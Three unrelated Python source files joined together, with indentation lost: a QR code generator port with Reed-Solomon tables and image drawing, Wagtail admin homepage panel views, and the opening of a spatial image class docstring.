self.dataCache = None
self.dataList = []
def addData(self, data):
newData = QR8bitByte(data)
self.dataList.append(newData)
self.dataCache = None
def isDark(self, row, col):
if (row < 0 or self.moduleCount <= row or col < 0 or self.moduleCount <= col):
return False
return self.modules[row][col]
def getModuleCount(self):
return self.moduleCount
def make(self):
self.makeImpl(False, self.getBestMaskPattern() )
def makeImpl(self, test, maskPattern):
self.moduleCount = self.typeNumber * 4 + 17
self.modules = [None for x in range(self.moduleCount)]
for row in range(self.moduleCount):
self.modules[row] = [None for x in range(self.moduleCount)]
for col in range(self.moduleCount):
self.modules[row][col] = None #//(col + row) % 3;
self.setupPositionProbePattern(0, 0)
self.setupPositionProbePattern(self.moduleCount - 7, 0)
self.setupPositionProbePattern(0, self.moduleCount - 7)
self.setupPositionAdjustPattern()
self.setupTimingPattern()
self.setupTypeInfo(test, maskPattern)
if (self.typeNumber >= 7):
self.setupTypeNumber(test)
if (self.dataCache == None):
self.dataCache = QRCode.createData(self.typeNumber, self.errorCorrectLevel, self.dataList)
self.mapData(self.dataCache, maskPattern)
def setupPositionProbePattern(self, row, col):
for r in range(-1, 8):
if (row + r <= -1 or self.moduleCount <= row + r): continue
for c in range(-1, 8):
if (col + c <= -1 or self.moduleCount <= col + c): continue
if ( (0 <= r and r <= 6 and (c == 0 or c == 6) )
or (0 <= c and c <= 6 and (r == 0 or r == 6) )
or (2 <= r and r <= 4 and 2 <= c and c <= 4) ):
self.modules[row + r][col + c] = True;
else:
self.modules[row + r][col + c] = False;
def getBestMaskPattern(self):
minLostPoint = 0
pattern = 0
for i in range(8):
self.makeImpl(True, i);
lostPoint = QRUtil.getLostPoint(self);
if (i == 0 or minLostPoint > lostPoint):
minLostPoint = lostPoint
pattern = i
return pattern
def createMovieClip(self):
raise Exception("Method not relevant to Python port")
def make_image(self,
mode = "RGBA", bg = "white", fg = "black", block_in_pixels = 10, border_in_blocks = 4, rounding = 0,
tl = True, bl = True, br = True, tr = True,
):
"""
tl (etc) allow corners not to be rounded if 'rounding' is used
"""
## http://nadiana.com/pil-tutorial-basic-advanced-drawing
def round_corner(radius, fg, bg):
"""Draw a round corner"""
corner = Image.new('RGBA', (radius, radius), bg)
draw = ImageDraw.Draw(corner)
draw.pieslice((0, 0, radius * 2, radius * 2), 180, 270, fill=fg)
return corner
def round_rectangle(size, radius, fg, bg, tl = True, bl = True, br = True, tr = True):
"""Draw a rounded rectangle"""
width, height = size
corner = round_corner(radius, fg, bg)
rectangle = Image.new('RGBA', size, fg)
if tl: rectangle.paste(corner, (0, 0))
if bl: rectangle.paste(corner.rotate(90), (0, height - radius)) # Rotate the corner and paste it
if br: rectangle.paste(corner.rotate(180), (width - radius, height - radius))
if tr: rectangle.paste(corner.rotate(270), (width - radius, 0))
return rectangle
block_in_pixels = 10 #pixels per box
border_in_blocks = 4 #boxes as border
pixelsize = (self.getModuleCount() + border_in_blocks + border_in_blocks) * block_in_pixels
im = Image.new(mode, (pixelsize, pixelsize), bg)
d = ImageDraw.Draw(im)
rr = None
if rounding > 0:
rr = round_rectangle(( block_in_pixels, block_in_pixels, ), rounding, fg, bg)
for r in range(self.getModuleCount()):
for c in range(self.getModuleCount()):
if not self.isDark(r, c):
continue
x = (c + border_in_blocks) * block_in_pixels
y = (r + border_in_blocks) * block_in_pixels
b = [(x,y),(x+block_in_pixels,y+block_in_pixels)]
if round > 0:
rr = round_rectangle(
( block_in_pixels, block_in_pixels, ),
rounding,
fg, bg,
tl = not ( self.isDark(r - 1, c) or self.isDark(r, c - 1) ) and tl,
bl = not ( self.isDark(r, c - 1) or self.isDark(r + 1, c) ) and bl,
tr = not ( self.isDark(r - 1, c) or self.isDark(r, c + 1) ) and tr,
br = not ( self.isDark(r + 1, c) or self.isDark(r, c + 1) ) and br,
)
im.paste(rr, (x, y))
pass
else:
d.rectangle(b,fill=fg)
del d
return im
def setupTimingPattern(self):
for r in range(8, self.moduleCount - 8):
if (self.modules[r][6] != None):
continue
self.modules[r][6] = (r % 2 == 0)
for c in range(8, self.moduleCount - 8):
if (self.modules[6][c] != None):
continue
self.modules[6][c] = (c % 2 == 0)
def setupPositionAdjustPattern(self):
pos = QRUtil.getPatternPosition(self.typeNumber)
for i in range(len(pos)):
for j in range(len(pos)):
row = pos[i]
col = pos[j]
if (self.modules[row][col] != None):
continue
for r in range(-2, 3):
for c in range(-2, 3):
if (r == -2 or r == 2 or c == -2 or c == 2 or (r == 0 and c == 0) ):
self.modules[row + r][col + c] = True
else:
self.modules[row + r][col + c] = False
def setupTypeNumber(self, test):
bits = QRUtil.getBCHTypeNumber(self.typeNumber)
for i in range(18):
mod = (not test and ( (bits >> i) & 1) == 1)
self.modules[i // 3][i % 3 + self.moduleCount - 8 - 3] = mod;
for i in range(18):
mod = (not test and ( (bits >> i) & 1) == 1)
self.modules[i % 3 + self.moduleCount - 8 - 3][i // 3] = mod;
def setupTypeInfo(self, test, maskPattern):
data = (self.errorCorrectLevel << 3) | maskPattern
bits = QRUtil.getBCHTypeInfo(data)
#// vertical
for i in range(15):
mod = (not test and ( (bits >> i) & 1) == 1)
if (i < 6):
self.modules[i][8] = mod
elif (i < 8):
self.modules[i + 1][8] = mod
else:
self.modules[self.moduleCount - 15 + i][8] = mod
#// horizontal
for i in range(15):
mod = (not test and ( (bits >> i) & 1) == 1);
if (i < 8):
self.modules[8][self.moduleCount - i - 1] = mod
elif (i < 9):
self.modules[8][15 - i - 1 + 1] = mod
else:
self.modules[8][15 - i - 1] = mod
#// fixed module
self.modules[self.moduleCount - 8][8] = (not test)
def mapData(self, data, maskPattern):
inc = -1
row = self.moduleCount - 1
bitIndex = 7
byteIndex = 0
for col in range(self.moduleCount - 1, 0, -2):
if (col == 6): col-=1
while (True):
for c in range(2):
if (self.modules[row][col - c] == None):
dark = False
if (byteIndex < len(data)):
dark = ( ( (data[byteIndex] >> bitIndex) & 1) == 1)
mask = QRUtil.getMask(maskPattern, row, col - c)
if (mask):
dark = not dark
self.modules[row][col - c] = dark
bitIndex-=1
if (bitIndex == -1):
byteIndex+=1
bitIndex = 7
row += inc
if (row < 0 or self.moduleCount <= row):
row -= inc
inc = -inc
break
PAD0 = 0xEC
PAD1 = 0x11
@staticmethod
def createData(typeNumber, errorCorrectLevel, dataList):
rsBlocks = QRRSBlock.getRSBlocks(typeNumber, errorCorrectLevel)
buffer = QRBitBuffer();
for i in range(len(dataList)):
data = dataList[i]
buffer.put(data.mode, 4)
buffer.put(data.getLength(), QRUtil.getLengthInBits(data.mode, typeNumber) )
data.write(buffer)
#// calc num max data.
totalDataCount = 0;
for i in range(len(rsBlocks)):
totalDataCount += rsBlocks[i].dataCount
if (buffer.getLengthInBits() > totalDataCount * 8):
raise CodeLengthOverflowError(bits = buffer.getLengthInBits(), maxbits = totalDataCount * 8)
#// end code
if (buffer.getLengthInBits() + 4 <= totalDataCount * 8):
buffer.put(0, 4)
#// padding
while (buffer.getLengthInBits() % 8 != 0):
buffer.putBit(False)
#// padding
while (True):
if (buffer.getLengthInBits() >= totalDataCount * 8):
break
buffer.put(QRCode.PAD0, 8)
if (buffer.getLengthInBits() >= totalDataCount * 8):
break
buffer.put(QRCode.PAD1, 8)
return QRCode.createBytes(buffer, rsBlocks)
@staticmethod
def createBytes(buffer, rsBlocks):
offset = 0
maxDcCount = 0
maxEcCount = 0
dcdata = [0 for x in range(len(rsBlocks))]
ecdata = [0 for x in range(len(rsBlocks))]
for r in range(len(rsBlocks)):
dcCount = rsBlocks[r].dataCount
ecCount = rsBlocks[r].totalCount - dcCount
maxDcCount = max(maxDcCount, dcCount)
maxEcCount = max(maxEcCount, ecCount)
dcdata[r] = [0 for x in range(dcCount)]
for i in range(len(dcdata[r])):
dcdata[r][i] = 0xff & buffer.buffer[i + offset]
offset += dcCount
rsPoly = QRUtil.getErrorCorrectPolynomial(ecCount)
rawPoly = QRPolynomial(dcdata[r], rsPoly.getLength() - 1)
modPoly = rawPoly.mod(rsPoly)
ecdata[r] = [0 for x in range(rsPoly.getLength()-1)]
for i in range(len(ecdata[r])):
modIndex = i + modPoly.getLength() - len(ecdata[r])
if (modIndex >= 0):
ecdata[r][i] = modPoly.get(modIndex)
else:
ecdata[r][i] = 0
totalCodeCount = 0
for i in range(len(rsBlocks)):
totalCodeCount += rsBlocks[i].totalCount
data = [None for x in range(totalCodeCount)]
index = 0
for i in range(maxDcCount):
for r in range(len(rsBlocks)):
if (i < len(dcdata[r])):
data[index] = dcdata[r][i]
index+=1
for i in range(maxEcCount):
for r in range(len(rsBlocks)):
if (i < len(ecdata[r])):
data[index] = ecdata[r][i]
index+=1
return data
class QRMaskPattern:
PATTERN000 = 0
PATTERN001 = 1
PATTERN010 = 2
PATTERN011 = 3
PATTERN100 = 4
PATTERN101 = 5
PATTERN110 = 6
PATTERN111 = 7
class QRUtil(object):
PATTERN_POSITION_TABLE = [
[],
[6, 18],
[6, 22],
[6, 26],
[6, 30],
[6, 34],
[6, 22, 38],
[6, 24, 42],
[6, 26, 46],
[6, 28, 50],
[6, 30, 54],
[6, 32, 58],
[6, 34, 62],
[6, 26, 46, 66],
[6, 26, 48, 70],
[6, 26, 50, 74],
[6, 30, 54, 78],
[6, 30, 56, 82],
[6, 30, 58, 86],
[6, 34, 62, 90],
[6, 28, 50, 72, 94],
[6, 26, 50, 74, 98],
[6, 30, 54, 78, 102],
[6, 28, 54, 80, 106],
[6, 32, 58, 84, 110],
[6, 30, 58, 86, 114],
[6, 34, 62, 90, 118],
[6, 26, 50, 74, 98, 122],
[6, 30, 54, 78, 102, 126],
[6, 26, 52, 78, 104, 130],
[6, 30, 56, 82, 108, 134],
[6, 34, 60, 86, 112, 138],
[6, 30, 58, 86, 114, 142],
[6, 34, 62, 90, 118, 146],
[6, 30, 54, 78, 102, 126, 150],
[6, 24, 50, 76, 102, 128, 154],
[6, 28, 54, 80, 106, 132, 158],
[6, 32, 58, 84, 110, 136, 162],
[6, 26, 54, 82, 110, 138, 166],
[6, 30, 58, 86, 114, 142, 170]
]
G15 = (1 << 10) | (1 << 8) | (1 << 5) | (1 << 4) | (1 << 2) | (1 << 1) | (1 << 0)
G18 = (1 << 12) | (1 << 11) | (1 << 10) | (1 << 9) | (1 << 8) | (1 << 5) | (1 << 2) | (1 << 0)
G15_MASK = (1 << 14) | (1 << 12) | (1 << 10) | (1 << 4) | (1 << 1)
@staticmethod
def getBCHTypeInfo(data):
d = data << 10;
while (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) >= 0):
d ^= (QRUtil.G15 << (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) ) )
return ( (data << 10) | d) ^ QRUtil.G15_MASK
@staticmethod
def getBCHTypeNumber(data):
d = data << 12;
while (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) >= 0):
d ^= (QRUtil.G18 << (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) ) )
return (data << 12) | d
@staticmethod
def getBCHDigit(data):
digit = 0;
while (data != 0):
digit += 1
data >>= 1
return digit
@staticmethod
def getPatternPosition(typeNumber):
return QRUtil.PATTERN_POSITION_TABLE[typeNumber - 1]
@staticmethod
def getMask(maskPattern, i, j):
if maskPattern == QRMaskPattern.PATTERN000 : return (i + j) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN001 : return i % 2 == 0
if maskPattern == QRMaskPattern.PATTERN010 : return j % 3 == 0
if maskPattern == QRMaskPattern.PATTERN011 : return (i + j) % 3 == 0
if maskPattern == QRMaskPattern.PATTERN100 : return (math.floor(i / 2) + math.floor(j / 3) ) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN101 : return (i * j) % 2 + (i * j) % 3 == 0
if maskPattern == QRMaskPattern.PATTERN110 : return ( (i * j) % 2 + (i * j) % 3) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN111 : return ( (i * j) % 3 + (i + j) % 2) % 2 == 0
raise Exception("bad maskPattern:" + maskPattern);
@staticmethod
def getErrorCorrectPolynomial(errorCorrectLength):
a = QRPolynomial([1], 0);
for i in range(errorCorrectLength):
a = a.multiply(QRPolynomial([1, QRMath.gexp(i)], 0) )
return a
@staticmethod
def getLengthInBits(mode, type):
if 1 <= type and type < 10:
#// 1 - 9
if mode == QRMode.MODE_NUMBER : return 10
if mode == QRMode.MODE_ALPHA_NUM : return 9
if mode == QRMode.MODE_8BIT_BYTE : return 8
if mode == QRMode.MODE_KANJI : return 8
raise Exception("mode:" + mode)
elif (type < 27):
#// 10 - 26
if mode == QRMode.MODE_NUMBER : return 12
if mode == QRMode.MODE_ALPHA_NUM : return 11
if mode == QRMode.MODE_8BIT_BYTE : return 16
if mode == QRMode.MODE_KANJI : return 10
raise Exception("mode:" + mode)
elif (type < 41):
#// 27 - 40
if mode == QRMode.MODE_NUMBER : return 14
if mode == QRMode.MODE_ALPHA_NUM : return 13
if mode == QRMode.MODE_8BIT_BYTE : return 16
if mode == QRMode.MODE_KANJI : return 12
raise Exception("mode:" + mode)
else:
raise Exception("type:" + type)
@staticmethod
def getLostPoint(qrCode):
moduleCount = qrCode.getModuleCount();
lostPoint = 0;
#// LEVEL1
for row in range(moduleCount):
for col in range(moduleCount):
sameCount = 0;
dark = qrCode.isDark(row, col);
for r in range(-1, 2):
if (row + r < 0 or moduleCount <= row + r):
continue
for c in range(-1, 2):
if (col + c < 0 or moduleCount <= col + c):
continue
if (r == 0 and c == 0):
continue
if (dark == qrCode.isDark(row + r, col + c) ):
sameCount+=1
if (sameCount > 5):
lostPoint += (3 + sameCount - 5)
#// LEVEL2
for row in range(moduleCount - 1):
for col in range(moduleCount - 1):
count = 0;
if (qrCode.isDark(row, col ) ): count+=1
if (qrCode.isDark(row + 1, col ) ): count+=1
if (qrCode.isDark(row, col + 1) ): count+=1
if (qrCode.isDark(row + 1, col + 1) ): count+=1
if (count == 0 or count == 4):
lostPoint += 3
#// LEVEL3
for row in range(moduleCount):
for col in range(moduleCount - 6):
if (qrCode.isDark(row, col)
and not qrCode.isDark(row, col + 1)
and qrCode.isDark(row, col + 2)
and qrCode.isDark(row, col + 3)
and qrCode.isDark(row, col + 4)
and not qrCode.isDark(row, col + 5)
and qrCode.isDark(row, col + 6) ):
lostPoint += 40
for col in range(moduleCount):
for row in range(moduleCount - 6):
if (qrCode.isDark(row, col)
and not qrCode.isDark(row + 1, col)
and qrCode.isDark(row + 2, col)
and qrCode.isDark(row + 3, col)
and qrCode.isDark(row + 4, col)
and not qrCode.isDark(row + 5, col)
and qrCode.isDark(row + 6, col) ):
lostPoint += 40
#// LEVEL4
darkCount = 0;
for col in range(moduleCount):
for row in range(moduleCount):
if (qrCode.isDark(row, col) ):
darkCount+=1
ratio = abs(100 * darkCount / moduleCount / moduleCount - 50) / 5
lostPoint += ratio * 10
return lostPoint
class QRMath:
@staticmethod
def glog(n):
if (n < 1):
raise Exception("glog(" + n + ")")
return LOG_TABLE[n];
@staticmethod
def gexp(n):
while n < 0:
n += 255
while n >= 256:
n -= 255
return EXP_TABLE[n];
EXP_TABLE = [x for x in range(256)]
LOG_TABLE = [x for x in range(256)]
for i in range(8):
EXP_TABLE[i] = 1 << i;
for i in range(8, 256):
EXP_TABLE[i] = EXP_TABLE[i - 4] ^ EXP_TABLE[i - 5] ^ EXP_TABLE[i - 6] ^ EXP_TABLE[i - 8]
for i in range(255):
LOG_TABLE[EXP_TABLE[i] ] = i
class QRPolynomial:
def __init__(self, num, shift):
if (len(num) == 0):
raise Exception(num.length + "/" + shift)
offset = 0
while offset < len(num) and num[offset] == 0:
offset += 1
self.num = [0 for x in range(len(num)-offset+shift)]
for i in range(len(num) - offset):
self.num[i] = num[i + offset]
def get(self, index):
return self.num[index]
def getLength(self):
return len(self.num)
def multiply(self, e):
num = [0 for x in range(self.getLength() + e.getLength() - 1)];
for i in range(self.getLength()):
for j in range(e.getLength()):
num[i + j] ^= QRMath.gexp(QRMath.glog(self.get(i) ) + QRMath.glog(e.get(j) ) )
return QRPolynomial(num, 0);
def mod(self, e):
if (self.getLength() - e.getLength() < 0):
return self;
ratio = QRMath.glog(self.get(0) ) - QRMath.glog(e.get(0) )
num = [0 for x in range(self.getLength())]
for i in range(self.getLength()):
num[i] = self.get(i);
for i in range(e.getLength()):
num[i] ^= QRMath.gexp(QRMath.glog(e.get(i) ) + ratio)
# recursive call
return QRPolynomial(num, 0).mod(e);
class QRRSBlock:
RS_BLOCK_TABLE = [
#// L
#// M
#// Q
#// H
#// 1
[1, 26, 19],
[1, 26, 16],
[1, 26, 13],
[1, 26, 9],
#// 2
[1, 44, 34],
[1, 44, 28],
[1, 44, 22],
[1, 44, 16],
#// 3
[1, 70, 55],
[1, 70, 44],
[2, 35, 17],
[2, 35, 13],
#// 4
[1, 100, 80],
[2, 50, 32],
[2, 50, 24],
[4, 25, 9],
#// 5
[1, 134, 108],
[2, 67, 43],
[2, 33, 15, 2, 34, 16],
[2, 33, 11, 2, 34, 12],
#// 6
[2, 86, 68],
[4, 43, 27],
[4, 43, 19],
[4, 43, 15],
#// 7
[2, 98, 78],
[4, 49, 31],
[2, 32, 14, 4, 33, 15],
[4, 39, 13, 1, 40, 14],
#// 8
[2, 121, 97],
[2, 60, 38, 2, 61, 39],
[4, 40, 18, 2, 41, 19],
[4, 40, 14, 2, 41, 15],
#// 9
[2, 146, 116],
[3, 58, 36, 2, 59, 37],
[4, 36, 16, 4, 37, 17],
[4, 36, 12, 4, 37, 13],
#// 10
[2, 86, 68, 2, 87, 69],
[4, 69, 43, 1, 70, 44],
[6, 43, 19, 2, 44, 20],
[6, 43, 15, 2, 44, 16],
# 11
[4, 101, 81],
[1, 80, 50, 4, 81, 51],
[4, 50, 22, 4, 51, 23],
[3, 36, 12, 8, 37, 13],
# 12
[2, 116, 92, 2, 117, 93],
[6, 58, 36, 2, 59, 37],
[4, 46, 20, 6, 47, 21],
[7, 42, 14, 4, 43, 15],
# 13
[4, 133, 107],
[8, 59, 37, 1, 60, 38],
[8, 44, 20, 4, 45, 21],
[12, 33, 11, 4, 34, 12],
# 14
[3, 145, 115, 1, 146, 116],
[4, 64, 40, 5, 65, 41],
[11, 36, 16, 5, 37, 17],
[11, 36, 12, 5, 37, 13],
# 15
[5, 109, 87, 1, 110, 88],
[5, 65, 41, 5, 66, 42],
[5, 54, 24, 7, 55, 25],
[11, 36, 12],
# 16
[5, 122, 98, 1, 123, 99],
[7, 73, 45, 3, 74, 46],
[15, 43, 19, 2, 44, 20],
[3, 45, 15, 13, 46, 16],
# 17
[1, 135, 107, 5, 136, 108],
[10, 74, 46, 1, 75, 47],
[1, 50, 22, 15, 51, 23],
[2, 42, 14, 17, 43, 15],
# 18
[5, 150, 120, 1, 151, 121],
[9, 69, 43, 4, 70, 44],
[17, 50, 22, 1, 51, 23],
[2, 42, 14, 19, 43, 15],
# 19
[3, 141, 113, 4, 142, 114],
[3, 70, 44, 11, 71, 45],
[17, 47, 21, 4, 48, 22],
[9, 39, 13, 16, 40, 14],
# 20
[3, 135, 107, 5, 136, 108],
[3, 67, 41, 13, 68, 42],
[15, 54, 24, 5, 55, 25],
[15, 43, 15, 10, 44, 16],
# 21
[4, 144, 116, 4, 145, 117],
[17, 68, 42],
[17, 50, 22, 6, 51, 23],
[19, 46, 16, 6, 47, 17],
# 22
[2, 139, 111, 7, 140, 112],
[17, 74, 46],
[7, 54, 24, 16, 55, 25],
[34, 37, 13],
# 23
[4, 151, 121, 5, 152, 122],
[4, 75, 47, 14, 76, 48],
[11, 54, 24, 14, 55, 25],
[16, 45, 15, 14, 46, 16],
# 24
[6, 147, 117, 4, 148, 118],
[6, 73, 45, 14, 74, 46],
[11, 54, 24, 16, 55, 25],
[30, 46, 16, 2, 47, 17],
# 25
[8, 132, 106, 4, 133, 107],
[8, 75, 47, 13, 76, 48],
[7, 54, 24, 22, 55, 25],
[22, 45, 15, 13, 46, 16],
# 26
[10, 142, 114, 2, 143, 115],
[19, 74, 46, 4, 75, 47],
[28, 50, 22, 6, 51, 23],
[33, 46, 16, 4, 47, 17],
# 27
[8, 152, 122, 4, 153, 123],
[22, 73, 45, 3, 74, 46],
[8, 53, 23, 26, 54, 24],
[12, 45, 15, 28, 46, 16],
# 28
[3, 147, 117, 10, 148, 118],
[3, 73, 45, 23, 74, 46],
[4, 54, 24, 31, 55, 25],
[11, 45, 15, 31, 46, 16],
# 29
[7, 146, 116, 7, 147, 117],
[21, 73, 45, 7, 74, 46],
[1, 53, 23, 37, 54, 24],
[19, 45, 15, 26, 46, 16],
# 30
[5, 145, 115, 10, 146, 116],
[19, 75, 47, 10, 76, 48],
[15, 54, 24, 25, 55, 25],
[23, 45, 15, 25, 46, 16],
# 31
[13, 145, 115, 3, 146, 116],
[2, 74, 46, 29, 75, 47],
[42, 54, 24, 1, 55, 25],
[23, 45, 15, 28, 46, 16],
# 32
[17, 145, 115],
[10, 74, 46, 23, 75, 47],
[10, 54, 24, 35, 55, 25],
[19, 45, 15, 35, 46, 16],
# 33
[17, 145, 115, 1, 146, 116],
[14, 74, 46, 21, 75, 47],
[29, 54, 24, 19, 55, 25],
[11, 45, 15, 46, 46, 16],
# 34
[13, 145, 115, 6, 146, 116],
[14, 74, 46, 23, 75, 47],
[44, 54, 24, 7, 55, 25],
[59, 46, 16, 1, 47, 17],
# 35
[12, 151, 121, 7, 152, 122],
[12, 75, 47, 26, 76, 48],
[39, 54, 24, 14, 55, 25],
[22, 45, 15, 41, 46, 16],
# 36
[6, 151, 121, 14, 152, 122],
[6, 75, 47, 34, 76, 48],
[46, 54, 24, 10, 55, 25],
[2, 45, 15, 64, 46, 16],
# 37
[17, 152, 122, 4, 153, 123],
[29, 74, 46, 14, 75, 47],
[49, 54, 24, 10, 55, 25],
[24, 45, 15, 46, 46, 16],
# 38
[4, 152, 122, 18, 153, 123],
[13, 74, 46, 32, 75, 47],
[48, 54, 24, 14, 55, 25],
[42, 45, 15, 32, 46, 16],
# 39
[20, 147, 117, 4, 148, 118],
[40, 75, 47, 7, 76, 48],
[43, 54, 24, 22, 55, 25],
[10, 45, 15, 67, 46, 16],
# 40
[19, 148, 118, 6, 149, 119],
[18, 75, 47, 31, 76, 48],
[34, 54, 24, 34, 55, 25],
[20, 45, 15, 61, 46, 16]
]
def __init__(self, totalCount, dataCount):
self.totalCount = totalCount
self.dataCount = dataCount
@staticmethod
def getRSBlocks(typeNumber, errorCorrectLevel):
rsBlock = QRRSBlock.getRsBlockTable(typeNumber, errorCorrectLevel);
if rsBlock == None:
raise Exception("bad rs block @ typeNumber:" + typeNumber + "/errorCorrectLevel:" + errorCorrectLevel)
length = len(rsBlock) / 3
list = []
for i in range(length):
count = rsBlock[i * 3 + 0]
totalCount = rsBlock[i * 3 + 1]
dataCount = rsBlock[i * 3 + 2]
for j in range(count):
list.append(QRRSBlock(totalCount, dataCount))
return list;
@staticmethod
def getRsBlockTable(typeNumber, errorCorrectLevel):
if errorCorrectLevel == QRErrorCorrectLevel.L:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 0];
elif errorCorrectLevel == QRErrorCorrectLevel.M:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 1];
elif errorCorrectLevel == QRErrorCorrectLevel.Q:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 2];
elif errorCorrectLevel == QRErrorCorrectLevel.H:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 3];
else:
return None;
class QRBitBuffer:
def __init__(self):
self.buffer = []
self.length = 0
def __repr__(self):
return ".".join([str(n) for n in self.buffer])
def get(self, index):
bufIndex = math.floor(index / 8)
val = ( (self.buffer[bufIndex] >> (7 - index % 8) ) & 1) == 1
print "get ", val
return ( (self.buffer[bufIndex] >> (7 - index % 8) ) & 1) == 1
def put(self, num, length):
for i in range(length):
self.putBit( ( (num >> (length - i - 1) ) & 1) == 1)
def getLengthInBits(self):
return self.length
def putBit(self, bit):
bufIndex = self.length // 8
if len(self.buffer) <= bufIndex:
self.buffer.append(0)
if bit:
self.buffer[bufIndex] |= (0x80 >> (self.length % 8) )
self.length+=1
| |
import itertools
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import permission_required
from django.db import connection
from django.db.models import Max, Q
from django.http import Http404, HttpResponse
from django.template.loader import render_to_string
from django.template.response import TemplateResponse
from wagtail.admin.navigation import get_site_for_user
from wagtail.admin.site_summary import SiteSummaryPanel
from wagtail.core import hooks
from wagtail.core.models import (
Page, PageRevision, TaskState, UserPagePermissionsProxy, WorkflowState)
User = get_user_model()
# Panels for the homepage
class UpgradeNotificationPanel:
name = 'upgrade_notification'
order = 100
def __init__(self, request):
self.request = request
def render(self):
if self.request.user.is_superuser and getattr(settings, "WAGTAIL_ENABLE_UPDATE_CHECK", True):
return render_to_string('wagtailadmin/home/upgrade_notification.html', {}, request=self.request)
else:
return ""
class IE11WarningPanel:
name = 'ie11_warning'
order = 110
def __init__(self, request):
self.request = request
def render(self):
return render_to_string('wagtailadmin/home/ie11_warning.html', {}, request=self.request)
class PagesForModerationPanel:
name = 'pages_for_moderation'
order = 200
def __init__(self, request):
self.request = request
user_perms = UserPagePermissionsProxy(request.user)
self.page_revisions_for_moderation = (user_perms.revisions_for_moderation()
.select_related('page', 'user').order_by('-created_at'))
def render(self):
return render_to_string('wagtailadmin/home/pages_for_moderation.html', {
'page_revisions_for_moderation': self.page_revisions_for_moderation,
}, request=self.request)
class UserPagesInWorkflowModerationPanel:
name = 'user_pages_in_workflow_moderation'
order = 210
def __init__(self, request):
self.request = request
# Find in progress workflow states which are either requested by the user or on pages owned by the user
self.workflow_states = (
WorkflowState.objects.active()
.filter(Q(page__owner=request.user) | Q(requested_by=request.user))
.select_related(
'page', 'current_task_state', 'current_task_state__task', 'current_task_state__page_revision'
)
.order_by('-current_task_state__started_at')
)
def render(self):
return render_to_string('wagtailadmin/home/user_pages_in_workflow_moderation.html', {
'workflow_states': self.workflow_states
}, request=self.request)
class WorkflowPagesToModeratePanel:
name = 'workflow_pages_to_moderate'
order = 220
def __init__(self, request):
self.request = request
states = (
TaskState.objects.reviewable_by(request.user)
.select_related('page_revision', 'task', 'page_revision__page')
.order_by('-started_at')
)
self.states = [
(state, state.task.specific.get_actions(page=state.page_revision.page, user=request.user), state.workflow_state.all_tasks_with_status())
for state in states
]
def render(self):
return render_to_string('wagtailadmin/home/workflow_pages_to_moderate.html', {
'states': self.states
}, request=self.request)
class LockedPagesPanel:
name = 'locked_pages'
order = 300
def __init__(self, request):
self.request = request
def render(self):
return render_to_string('wagtailadmin/home/locked_pages.html', {
'locked_pages': Page.objects.filter(
locked=True,
locked_by=self.request.user,
),
'can_remove_locks': UserPagePermissionsProxy(self.request.user).can_remove_locks()
}, request=self.request)
class RecentEditsPanel:
name = 'recent_edits'
order = 250
def __init__(self, request):
self.request = request
# Last n edited pages
edit_count = getattr(settings, 'WAGTAILADMIN_RECENT_EDITS_LIMIT', 5)
if connection.vendor == 'mysql':
# MySQL can't handle the subselect created by the ORM version -
# it fails with "This version of MySQL doesn't yet support 'LIMIT & IN/ALL/ANY/SOME subquery'"
last_edits = PageRevision.objects.raw(
"""
SELECT wp.* FROM
wagtailcore_pagerevision wp JOIN (
SELECT max(created_at) AS max_created_at, page_id FROM
wagtailcore_pagerevision WHERE user_id = %s GROUP BY page_id ORDER BY max_created_at DESC LIMIT %s
) AS max_rev ON max_rev.max_created_at = wp.created_at ORDER BY wp.created_at DESC
""", [
User._meta.pk.get_db_prep_value(self.request.user.pk, connection),
edit_count
]
)
else:
last_edits_dates = (PageRevision.objects.filter(user=self.request.user)
.values('page_id').annotate(latest_date=Max('created_at'))
.order_by('-latest_date').values('latest_date')[:edit_count])
last_edits = PageRevision.objects.filter(created_at__in=last_edits_dates).order_by('-created_at')
page_keys = [pr.page_id for pr in last_edits]
pages = Page.objects.specific().in_bulk(page_keys)
self.last_edits = [
[review, pages.get(review.page.pk)] for review in last_edits
]
def render(self):
return render_to_string('wagtailadmin/home/recent_edits.html', {
'last_edits': list(self.last_edits),
}, request=self.request)
def home(request):
panels = [
SiteSummaryPanel(request),
UpgradeNotificationPanel(request),
IE11WarningPanel(request),
WorkflowPagesToModeratePanel(request),
PagesForModerationPanel(request),
UserPagesInWorkflowModerationPanel(request),
RecentEditsPanel(request),
LockedPagesPanel(request),
]
for fn in hooks.get_hooks('construct_homepage_panels'):
fn(request, panels)
site_details = get_site_for_user(request.user)
return TemplateResponse(request, "wagtailadmin/home.html", {
'root_page': site_details['root_page'],
'root_site': site_details['root_site'],
'site_name': site_details['site_name'],
'panels': sorted(panels, key=lambda p: p.order),
'user': request.user
})
def error_test(request):
raise Exception("This is a test of the emergency broadcast system.")
@permission_required('wagtailadmin.access_admin', login_url='wagtailadmin_login')
def default(request):
"""
Called whenever a request comes in with the correct prefix (eg /admin/) but
doesn't actually correspond to a Wagtail view.
For authenticated users, it'll raise a 404 error. Anonymous users will be
redirected to the login page.
"""
raise Http404
_icons_html = None
def icons():
global _icons_html
if _icons_html is None:
icon_hooks = hooks.get_hooks('register_icons')
all_icons = sorted(itertools.chain.from_iterable(hook([]) for hook in icon_hooks))
_icons_html = render_to_string("wagtailadmin/shared/icons.html", {'icons': all_icons})
return _icons_html
def sprite(request):
return HttpResponse(icons())
| |
''' Very simple spatial image class
The image class maintains the association between a 3D (or greater)
array, and an affine transform that maps voxel coordinates to some real
world space. It also has a ``header`` - some standard set of meta-data
that is specific to the image format - and ``extra`` - a dictionary
container for any other metadata.
It has attributes:
* extra
methods:
* .get_data()
* .get_affine()
* .get_header()
* .get_shape()
* .set_shape(shape)
* .to_filename(fname) - writes data to filename(s) derived from
